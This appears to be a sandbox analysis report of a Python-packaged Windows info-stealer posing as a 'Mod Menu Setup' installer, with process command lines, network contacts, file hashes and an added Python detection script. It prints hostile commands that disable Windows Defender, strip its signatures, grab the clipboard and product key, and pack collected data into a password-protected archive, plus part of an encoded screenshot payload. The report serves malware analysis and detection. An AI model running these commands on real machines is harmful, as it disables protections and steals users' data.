AZQBlAG4AcwAoACkADQAKAA0ACgANAAoAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAC4AQwBvAHUAbgB0ADsAIAAkAGkAKwArACkAewANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAIAA9ACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AHMAWwAkAGkAXQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBTAGEAdgBlACgAIgAuAC8ARABpAHMAcABsAGEAeQAgACgAJAAoACQAaQArADEAKQApAC4AcABuAGcAIgApAA0ACgAgACAAIAAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdAAuAEQAaQBzAHAAbwBzAGUAKAApAA0ACgB9AA="
Decoded (the payload is base64 of UTF-16LE text): a PowerShell here-string defining a C# class Screenshot whose CaptureScreens() iterates Screen.AllScreens, copies each monitor's bounds into a Bitmap with Graphics.CopyFromScreen and swallows any exception; the script then runs Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms, calls [Screenshot]::CaptureScreens(), and saves each capture as "./Display (N).png" before disposing it. Add-Type compiles the class with csc.exe, which is why csc.exe and cvtres.exe appear as children of powershell.exe in the process tree.

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\tasklist.exe

tasklist /FO LIST

C:\Windows\System32\Wbem\WMIC.exe

WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName

C:\Windows\system32\systeminfo.exe

systeminfo

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-Clipboard

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand (same base64 payload as in the cmd.exe /c wrapper listed above)

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Program Files\Windows Defender\MpCmdRun.exe

"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.cmdline"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "tree /A /F"

C:\Windows\system32\tree.com

tree /A /F

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D8F.tmp" "c:\Users\Admin\AppData\Local\Temp\x4vexh3c\CSC505AB3B7C03E44ECBF92EC98A75BE30.TMP"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "getmac"

C:\Windows\system32\getmac.exe

getmac

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\8LMCx.zip" *"

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe a -r -hp"n" "C:\Users\Admin\AppData\Local\Temp\8LMCx.zip" *

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic os get Caption"

C:\Windows\System32\Wbem\WMIC.exe

wmic os get Caption

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"

C:\Windows\System32\Wbem\WMIC.exe

wmic computersystem get totalphysicalmemory

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"

C:\Windows\System32\Wbem\WMIC.exe

wmic csproduct get uuid

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"

C:\Windows\System32\Wbem\WMIC.exe

wmic path win32_VideoController get name

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
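The process list above shows the stealer's whole sequence in plain command lines: Add-MpPreference adds a Defender exclusion for the sample's own path; Set-MpPreference switches off real-time, IOAV and script scanning, drops network protection to audit mode and disables cloud reporting and sample submission; MpCmdRun.exe -RemoveDefinitions -All strips the signature database; then host reconnaissance (tasklist, systeminfo, getmac, WMIC for the AV product, OS, RAM, UUID and video controller, the PROCESSOR_IDENTIFIER and BackupProductKeyDefault registry values), clipboard theft with Get-Clipboard, a screenshot routine hidden behind -EncodedCommand, and finally rar.exe a -r -hp"n" packing the collected data into a header-encrypted archive (password n) ready for upload. The following Python triage script is an added example, not part of the report or of the malware: it decodes -EncodedCommand payloads (base64 of UTF-16LE) and runs a small rule set over both the raw and the decoded command lines, since a rule that only sees the raw line misses the Add-Type call entirely. Its inputs are copied from the Processes section, except that the encoded payload is cut down to the report's first 72 base64 characters and a second, constructed payload stands in for the Add-Type call; the rule names and regular expressions are the example's own.

```python
"""Triage the command lines from a sandbox process list.

Added example; it is not part of the sandbox report and not code from the
malware. COMMAND_LINES is copied from the report's Processes section, except
that the -EncodedCommand payload is cut down to the report's first 72 base64
characters (the real one is several kilobytes) and a second, constructed
payload stands in for the Add-Type call, to show why rules must also run on
the decoded text.
"""
import base64
import re

# First 72 base64 characters of the report's -EncodedCommand payload (UTF-16LE).
REPORT_ENCODED_PREFIX = (
    "JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsA"
)

# -EncodedCommand takes base64 of the script as UTF-16LE; PowerShell also
# accepts the abbreviations -e, -ec and -enc, which real logs use far more often.
ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)


def encode_command(script: str) -> str:
    """Encode a script the way PowerShell expects it for -EncodedCommand."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the decoded -EncodedCommand text, or None if the line has none."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    return base64.b64decode(m.group(1)).decode("utf-16-le", errors="replace")


# Constructed here, not from the report: a shortened stand-in for the
# payload's Add-Type call, so that a decoded-text rule has something to hit.
CONSTRUCTED_ENCODED = encode_command(
    "Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms"
)

COMMAND_LINES = [
    # Copied from the report's Processes section.
    "powershell -Command Add-MpPreference -ExclusionPath "
    "'C:\\Users\\Admin\\AppData\\Local\\Temp\\Mod Menu Setup.exe'",
    "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true "
    "-DisableIOAVProtection $true -DisableRealtimeMonitoring $true "
    "-DisableScriptScanning $true -EnableControlledFolderAccess Disabled "
    "-EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled "
    "-SubmitSamplesConsent NeverSend",
    '"C:\\Program Files\\Windows Defender\\MpCmdRun.exe" -RemoveDefinitions -All',
    "WMIC /Node:localhost /Namespace:\\\\root\\SecurityCenter2 "
    "Path AntivirusProduct Get displayName",
    "tasklist /FO LIST",
    "powershell Get-Clipboard",
    "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\\Microsoft\\Windows NT\\"
    "CurrentVersion\\SoftwareProtectionPlatform' -Name BackupProductKeyDefault",
    'C:\\Users\\Admin\\AppData\\Local\\Temp\\_MEI33762\\rar.exe a -r -hp"n" '
    '"C:\\Users\\Admin\\AppData\\Local\\Temp\\8LMCx.zip" *',
    # The report's encoded command, truncated to its first 72 base64 characters.
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + REPORT_ENCODED_PREFIX,
    # Constructed, not from the report (see CONSTRUCTED_ENCODED above).
    "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand " + CONSTRUCTED_ENCODED,
]

# (rule name, regex) pairs written for this example; each names a behaviour
# the report's signatures already describe.
RULES = [
    ("defender_exclusion_added", r"Add-MpPreference\s+-ExclusionPath"),
    ("defender_protection_disabled", r"Set-MpPreference\b.*-Disable\w+\s+\$true"),
    ("defender_definitions_removed", r"MpCmdRun\.exe.*-RemoveDefinitions"),
    ("av_product_enumeration", r"SecurityCenter2.*AntivirusProduct"),
    ("process_enumeration", r"^tasklist\b"),
    ("clipboard_capture", r"\bGet-Clipboard\b"),
    ("product_key_read", r"SoftwareProtectionPlatform.*BackupProductKeyDefault"),
    ("encrypted_archive_staging", r"\brar\.exe\b.*\s-hp"),
    ("encoded_powershell", ENC_RE.pattern),
    ("inline_csharp_compile", r"Add-Type\s+-TypeDefinition"),
]


def triage(cmdlines):
    """Return {rule: [matching text, ...]}; encoded payloads are decoded and scanned too."""
    hits = {}
    for cmd in cmdlines:
        texts = [cmd]
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            texts.append(decoded)
        for text in texts:
            for name, pattern in RULES:
                if re.search(pattern, text, re.IGNORECASE):
                    hits.setdefault(name, []).append(text)
    return hits


if __name__ == "__main__":
    for rule, matches in sorted(triage(COMMAND_LINES).items()):
        print(rule)
        for text in matches:
            print("   ", text[:100].replace("\r\n", " "))
```

The 72-character prefix decodes to the opening of the here-string ($source = @" followed by using System;), which is enough to confirm the payload format; the constructed payload is the only line on which inline_csharp_compile fires, and it fires only because the decoded text is scanned. On a real host the same checks belong on the PowerShell script block log (event 4104) and on Defender's own tamper events (Microsoft-Windows-Windows Defender/Operational 5001, 5004, 5007), which survive even when the process list does not.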

Network

Country Destination Domain Proto
US 8.8.8.8:53 gstatic.com udp
GB 172.217.16.227:443 gstatic.com tcp
US 8.8.8.8:53 227.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 discord.com udp
US 162.159.137.232:443 discord.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 232.137.159.162.in-addr.arpa udp
IE 52.111.236.23:443 tcp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\_MEI33762\python311.dll

MD5 5f6fd64ec2d7d73ae49c34dd12cedb23
SHA1 c6e0385a868f3153a6e8879527749db52dce4125
SHA256 ff9f102264d1944fbfae2ba70e7a71435f51a3e8c677fd970b621c4c9ea71967
SHA512 c4be2d042c6e4d22e46eacfd550f61b8f55814bfe41d216a4df48382247df70bc63151068513855aa78f9b3d2f10ba6a824312948324c92de6dd0f6af414e8ab

C:\Users\Admin\AppData\Local\Temp\_MEI33762\VCRUNTIME140.dll

MD5 49c96cecda5c6c660a107d378fdfc3d4
SHA1 00149b7a66723e3f0310f139489fe172f818ca8e
SHA256 69320f278d90efaaeb67e2a1b55e5b0543883125834c812c8d9c39676e0494fc
SHA512 e09e072f3095379b0c921d41d6e64f4f1cd78400594a2317cfb5e5dca03dedb5a8239ed89905c9e967d1acb376b0585a35addf6648422c7ddb472ce38b1ba60d

memory/4276-29-0x00007FF840520000-0x00007FF840B09000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\_MEI33762\base_library.zip

MD5 32ede00817b1d74ce945dcd1e8505ad0
SHA1 51b5390db339feeed89bffca925896aff49c63fb
SHA256 4a73d461851b484d213684f0aadf59d537cba6fe7e75497e609d54c9f2ba5d4a
SHA512 a0e070b2ee1347e85f37e9fd589bc8484f206fa9c8f4020de147b815d2041293551e3a14a09a6eb4050cfa1f74843525377e1a99bbdcfb867b61ebddb89f21f7

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ctypes.pyd

MD5 00f75daaa7f8a897f2a330e00fad78ac
SHA1 44aec43e5f8f1282989b14c4e3bd238c45d6e334
SHA256 9ffadcb2c40ae6b67ab611acc09e050bbe544672cf05e8402a7aa3936326de1f
SHA512 f222f0ebf16a5c6d16aa2fba933034e692e26e81fea4d8b008259aff4102fe8acf3807f3b016c24002daa15bb8778d7fef20f4ae1206d5a6e226f7336d4da5d4

C:\Users\Admin\AppData\Local\Temp\_MEI33762\libffi-8.dll

MD5 08b000c3d990bc018fcb91a1e175e06e
SHA1 bd0ce09bb3414d11c91316113c2becfff0862d0d
SHA256 135c772b42ba6353757a4d076ce03dbf792456143b42d25a62066da46144fece
SHA512 8820d297aeda5a5ebe1306e7664f7a95421751db60d71dc20da251bcdfdc73f3fd0b22546bd62e62d7aa44dfe702e4032fe78802fb16ee6c2583d65abc891cbf

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_ssl.pyd

MD5 f9cc7385b4617df1ddf030f594f37323
SHA1 ebceec12e43bee669f586919a928a1fd93e23a97
SHA256 b093aa2e84a30790abeee82cf32a7c2209978d862451f1e0b0786c4d22833cb6
SHA512 3f362c8a7542212d455f1f187e24f63c6190e564ade0f24561e7e20375a1f15eb36bd8dce9fdaafdab1d6b348a1c6f7cddb9016e4f3535b49136550bc23454fb

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_queue.pyd

MD5 347d6a8c2d48003301032546c140c145
SHA1 1a3eb60ad4f3da882a3fd1e4248662f21bd34193
SHA256 e71803913b57c49f4ce3416ec15dc8a9e5c14f8675209624e76cd71b0319b192
SHA512 b1fdb46b80bb4a39513685781d563a7d55377e43e071901930a13c3e852d0042a5302cd238ddf6ea4d35ceee5a613c96996bffad2da3862673a0d27e60ff2c06

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_hashlib.pyd

MD5 b227bf5d9fec25e2b36d416ccd943ca3
SHA1 4fae06f24a1b61e6594747ec934cbf06e7ec3773
SHA256 d42c3550e58b9aa34d58f709dc65dc4ee6eea83b651740822e10b0aa051df1d7
SHA512 c6d7c5a966c229c4c7042ef60015e3333dab86f83c230c97b8b1042231fdb2a581285a5a08c33ad0864c6bd82f5a3298964ab317736af8a43e7caa7669298c3e

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_decimal.pyd

MD5 e3fb8bf23d857b1eb860923ccc47baa5
SHA1 46e9d5f746c047e1b2fefaaf8d3ec0f2c56c42f0
SHA256 7da13df1f416d3ffd32843c895948e460af4dc02cf05c521909555061ed108e3
SHA512 7b0a1fc00c14575b8f415fadc2078bebd157830887dc5b0c4414c8edfaf9fc4a65f58e5cceced11252ade4e627bf17979db397f4f0def9a908efb2eb68cd645c

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_bz2.pyd

MD5 c413931b63def8c71374d7826fbf3ab4
SHA1 8b93087be080734db3399dc415cc5c875de857e2
SHA256 17bfa656cabf7ef75741003497a1c315b10237805ff171d44625a04c16532293
SHA512 7dc45e7e5ed35cc182de11a1b08c066918920a6879ff8e37b6bfbdd7d40bffa39ea4aca778aa8afb99c81a365c51187db046bceb938ce9ace0596f1cf746474f

C:\Users\Admin\AppData\Local\Temp\_MEI33762\unicodedata.pyd

MD5 8c42fcc013a1820f82667188e77be22d
SHA1 fba7e4e0f86619aaf2868cedd72149e56a5a87d4
SHA256 0e00b0e896457ecdc6ef85a8989888ccfbf05ebd8d8a1c493946a2f224b880c2
SHA512 3a028443747d04d05fdd3982bb18c52d1afee2915a90275264bf5db201bd4612090914c7568f870f0af7dfee850c554b3fec9d387334d53d03da6426601942b4

C:\Users\Admin\AppData\Local\Temp\_MEI33762\sqlite3.dll

MD5 dbc64142944210671cca9d449dab62e6
SHA1 a2a2098b04b1205ba221244be43b88d90688334c
SHA256 6e6b6f7df961c119692f6c1810fbfb7d40219ea4e5b2a98c413424cf02dce16c
SHA512 3bff546482b87190bb2a499204ab691532aa6f4b4463ab5c462574fc3583f9fc023c1147d84d76663e47292c2ffc1ed1cb11bdb03190e13b6aa432a1cef85c4b

C:\Users\Admin\AppData\Local\Temp\_MEI33762\select.pyd

MD5 45d5a749e3cd3c2de26a855b582373f6
SHA1 90bb8ac4495f239c07ec2090b935628a320b31fc
SHA256 2d15c2f311528440aa29934920fb0b015eaf8cbe3b3c9ad08a282a2d6ba68876
SHA512 c7a641d475a26712652a84b8423155ca347e0ec0155bd257c200225a64752453e4763b8885d8fb043b30e92ae023a501fff04777ba5cfe54da9a68071f25fbea

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rarreg.key

MD5 4531984cad7dacf24c086830068c4abe
SHA1 fa7c8c46677af01a83cf652ef30ba39b2aae14c3
SHA256 58209c8ab4191e834ffe2ecd003fd7a830d3650f0fd1355a74eb8a47c61d4211
SHA512 00056f471945d838ef2ce56d51c32967879fe54fcbf93a237ed85a98e27c5c8d2a39bc815b41c15caace2071edd0239d775a31d1794dc4dba49e7ecff1555122

C:\Users\Admin\AppData\Local\Temp\_MEI33762\rar.exe

MD5 9c223575ae5b9544bc3d69ac6364f75e
SHA1 8a1cb5ee02c742e937febc57609ac312247ba386
SHA256 90341ac8dcc9ec5f9efe89945a381eb701fe15c3196f594d9d9f0f67b4fc2213
SHA512 57663e2c07b56024aaae07515ee3a56b2f5068ebb2f2dc42be95d1224376c2458da21c965aab6ae54de780cb874c2fc9de83d9089abf4536de0f50faca582d09

C:\Users\Admin\AppData\Local\Temp\_MEI33762\libssl-3.dll

MD5 bf4a722ae2eae985bacc9d2117d90a6f
SHA1 3e29de32176d695d49c6b227ffd19b54abb521ef
SHA256 827fdb184fdcde9223d09274be780fe4fe8518c15c8fc217748ad5fd5ea0f147
SHA512 dd83b95967582152c7b5581121e6b69a07073e7a76fe87975742bb0fd7ecef7494ec940dba914364034cc4e3f623be98cc887677b65c208f14a2a9fc7497ca73

C:\Users\Admin\AppData\Local\Temp\_MEI33762\libcrypto-3.dll

MD5 78ebd9cb6709d939e4e0f2a6bbb80da9
SHA1 ea5d7307e781bc1fa0a2d098472e6ea639d87b73
SHA256 6a8c458e3d96f8dd3bf6d3cacc035e38edf7f127eee5563b51f8c8790ced0b3e
SHA512 b752769b3de4b78905b0326b5270091642ac89ff204e9e4d78670791a1fa211a54d777aeef59776c21f854c263add163adaef6a81b166190518cfaaf4e2e4122

C:\Users\Admin\AppData\Local\Temp\_MEI33762\blank.aes

MD5 129d7beafd76a500a2cb82cdf5419137
SHA1 21f4e02cc719af60a74d03b898f92b1a2430b7c1
SHA256 a71db04597f4fd4113d75d6cb8f96d81047e5158f9d5abd7f2f951ad272fd3a1
SHA512 34946fe3bff2fd328437c2bf11cdb026f0d5606d1492a5ae8ef0905276145c0e8fa1ef47fc2774fc52afb63731a2157e5339fcce561384ac1a948bca71d3fc7f

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_sqlite3.pyd

MD5 1a8fdc36f7138edcc84ee506c5ec9b92
SHA1 e5e2da357fe50a0927300e05c26a75267429db28
SHA256 8e4b9da9c95915e864c89856e2d7671cd888028578a623e761aeac2feca04882
SHA512 462a8f995afc4cf0e041515f0f68600dfd0b0b1402be7945d60e2157ffd4e476cf2ae9cdc8df9595f0fe876994182e3e43773785f79b20c6df08c8a8c47fffa0

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_socket.pyd

MD5 1a34253aa7c77f9534561dc66ac5cf49
SHA1 fcd5e952f8038a16da6c3092183188d997e32fb9
SHA256 dc03d32f681634e682b02e9a60fdfce420db9f26754aefb9a58654a064dc0f9f
SHA512 ff9eeb4ede4b4dd75c67fab30d0dec462b8af9ca6adc1dcae58f0d169c55a98d85bb610b157f17077b8854ec15af4dfab2f0d47fa9bc463e5b2449979a50293a

C:\Users\Admin\AppData\Local\Temp\_MEI33762\_lzma.pyd

MD5 542eab18252d569c8abef7c58d303547
SHA1 05eff580466553f4687ae43acba8db3757c08151
SHA256 d2a7111feeaacac8b3a71727482565c46141cc7a5a3d837d8349166bea5054c9
SHA512 b7897b82f1aa9d5aa895c3de810dab1aa335fdf7223e4ff29b32340ad350d9be6b145f95a71c7bc7c88c8df77c3f04853ae4d6f0d5a289721fc1468ecba3f958

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5swxshu5.nax.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0028ba9bec2f572910763eabe4a93f95
SHA1 42cd40f41cb73dc17a6c3fb079784045b547e365
SHA256 605aa5910ea90edfe2e91966d28a7505633aed19665f127db755628d92fd048c
SHA512 ec7af8c6caabfc57cf597f90bdbdb9a58adad362e8d9be6e03c4519e82c88b906c6a3b1cd4e1a7c63cbe0e12f90f74af4fcdea82023759e59cc3f2a53fe6cdb5

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 cd5b15b46b9fe0d89c2b8d351c303d2a
SHA1 e1d30a8f98585e20c709732c013e926c7078a3c2
SHA256 0a8a0dcbec27e07c8dc9ef31622ac41591871416ccd9146f40d8cc9a2421da7a
SHA512 d7261b2ff89adcdb909b775c6a47b3cd366b7c3f5cbb4f60428e849582c93e14e76d7dcadec79003eef7c9a3059e305d5e4f6b5b912b9ebc3518e06b0d284dd7

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 0390df3460c1c3e8c8c622ba4d143bae
SHA1 b5018aa9ed59a4b1bc90823b79c509e08f7d8aaf
SHA256 76081ae1b323ab391e0a58cc569b3e39ff17720e7be8a5d5c954a82569232d33
SHA512 4571c166036fd359d6ee6c3423fd1a21c4cb32ec720ed51014c6059451d1030f0be3d396c33bfe3023f360cd8dcaca49a671bc9c3029a2bbddeefd7c1c17e4e8

\??\c:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.cmdline

MD5 cdb0ec6975810290b024276755226627
SHA1 93ef2ac01e5cc557854f8847a049c622c65f7c0b
SHA256 569b47962a91df8bfd2a4f441db401a3ee0adefbd8037812cc3d682cae25ab4b
SHA512 e7ef6a60c0719fa9bc3a7112838800d24bc42b3f7054c8306fea648f6a314f7f4f784d582ac69ae8e9bb43ad5c8a926dc5a21d73681d239bb7b8da4cb316f224

\??\c:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.0.cs

MD5 c76055a0388b713a1eabe16130684dc3
SHA1 ee11e84cf41d8a43340f7102e17660072906c402
SHA256 8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7
SHA512 22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

\??\c:\Users\Admin\AppData\Local\Temp\x4vexh3c\CSC505AB3B7C03E44ECBF92EC98A75BE30.TMP

MD5 e6885532046d4b2cb3482fedd18aff86
SHA1 65551193478c3192ad50d304e6cc1bf1a4c396ce
SHA256 654ec01a3fc13096e5f58699065c1df90cca156bcece13270d80e50e63f8a563
SHA512 4a6a032594f2518e3ed06b9c43eadb45eb6da702c09711e29882dfc03e081b68b201069c270c89a2c01e0f85996add300e17826804fb02e8e5ef3059c7ce3ec5

C:\Users\Admin\AppData\Local\Temp\RES6D8F.tmp

MD5 6719280a8b3743bb4b210f197df28958
SHA1 c4204d4808da3d127728f8cf3ca2140b27febb41
SHA256 a7c0951059dddcd1a6dc8460941278d1900bb57d2625a8fcf0a736b316af4990
SHA512 1df9d81b41a6eecae04d2936d53809933540b7e5ccd135c34dd421d746d038bd2fb69bc0a593dd5226c0713f161b6a7bc4dba42b52101a2b9d01533ddde361c2

C:\Users\Admin\AppData\Local\Temp\x4vexh3c\x4vexh3c.dll

MD5 50711d5e4a06e0af681b8df6858dac20
SHA1 8fe2a1ec768c71dd489290741841a5471f1bab0e
SHA256 00c1a3707bf0a551c09cbcd30efb2311f551045f153b6d0d5f7e8e8ecdd15056
SHA512 eba0fd227596140fec2a1d577b9d32209f9dc592344c799024bba51ff46048be6b9ac59ff87cf016dd7e2bf79c5fd7bafb07362ae382b7f2abf1a978a29025af

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 57d6e35a75800223cbe126e149aecb51
SHA1 f35b08048b78b9f43285d9d25efbc372336602f5
SHA256 7715e7d4906719c39b58c6752cb0ffdda5d341cafc9980c469d5eb263bc79d87
SHA512 8ae91d0ddb5da9791408867f4efb1eb4af4063a65c200f6cfec54f8fb303a4b58a1aba9c9e42a0fbfd4b4ee9e5b55a62065bd971a2e8f501dc1fa542972c1f39

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Desktop.txt

MD5 8b7168b4944e2f5feda0090c68e52739
SHA1 64eb37a433ed0660527f8a602e2cdda40409c405
SHA256 5440367e49f5e15b227a5aeffc5517b1422ed6a9bd62e3ce5d31ec0351a80658
SHA512 9255b91d9e476eee6b093d86a83e5b7db9e544a93f131d9751272334c707eca441c640bb26da0a805b7e1b0a0e1172d83bf6fb84350bd39f0e2dbe2724eff4e4

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Documents.txt

MD5 02fd23b22c0d226936c30234eaf5ec33
SHA1 f81933c6938379a23cd8e8a813920947a86f86c9
SHA256 2bda37a42c61027dd9a272170e3e3d20acb3fed775b33c9492f239f5bebcd708
SHA512 326ff7396a39e74a67c7295fca67ff97acd3ff875ddcc953d743728e916923bb2fd1de0b888f1d0af4c8a04a68d70053e606272fa89b0a9eecdf144fcfe1ebed

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Downloads.txt

MD5 432bb2e844e8d2cf433b6c4229d5d622
SHA1 8717497b379052b92df929526312f80a15ad0c2a
SHA256 2d281a12d7765e5e1e6d6730f0157b42d291b493d4157fd59c61a28d5b205539
SHA512 110bdc9006876b8f7f549b8b4282bb1058b2e8a42db21e5cfa09c3f873a674464ee8225cb1cbf7184d15ecb0f392bb9c78412108a9acd400aa27fbe465f5e639

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Music.txt

MD5 c57550453efc90847b1d89a697f617e2
SHA1 8568acd773dffa296dcb3fe460e0e9d534e0f006
SHA256 200ab092ae0f22112966b75a94af6a5617a9b63f75280dec7081ba7d4c55af5f
SHA512 75dc66dcfccde739f713e8216373075ac73c9f46a2c6aef361138f721136504f0159cafef8ebe00990fe79256350fe8096cb46564fe299b8f6ee879f0a95ce98

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Videos.txt

MD5 e140e10b2b43ba6f978bee0aa90afaf7
SHA1 bbbeb7097ffa9c2daa3206b3f212d3614749c620
SHA256 c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618
SHA512 df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Directories\Pictures.txt

MD5 aa6063caac7ea4af4febbf7bde57dce1
SHA1 c6f6decc73d161ac22242be29777b909c1cf0c7c
SHA256 9a842b2dd81f26a6e19341315f236578e0cb05ac149d7f285b485ad7a84a1c45
SHA512 73c5f9c654c1813ae691b74a3b3dada810f55c48541872abd4105e18a37e4d266ab4e5a36c07adaad5fefc408677d254e05eb43e9eec0e5120b75ce1436eab4c

C:\Users\Admin\AppData\Local\Temp\‎ ‎‌  ‍  ‍\Display (1).png

MD5 057434a969b871dd584d4c55f6b0a290
SHA1 fbdf452552d0aeac3984c70fdd5381f936b4cf70
SHA256 087cfe19f2477aef3898838a0ec3a3415ccee3ae0dc5ad7a8b3079cfdf8ce9ad
SHA512 edd2f7af8567d2675a2ad33501c9f85eda6c6badfe6a52317e91bfc54c6528dc14ecf882b092a275cb1e97446d2bb9dfc24e8c376ad898a8fb4162a804cd6283

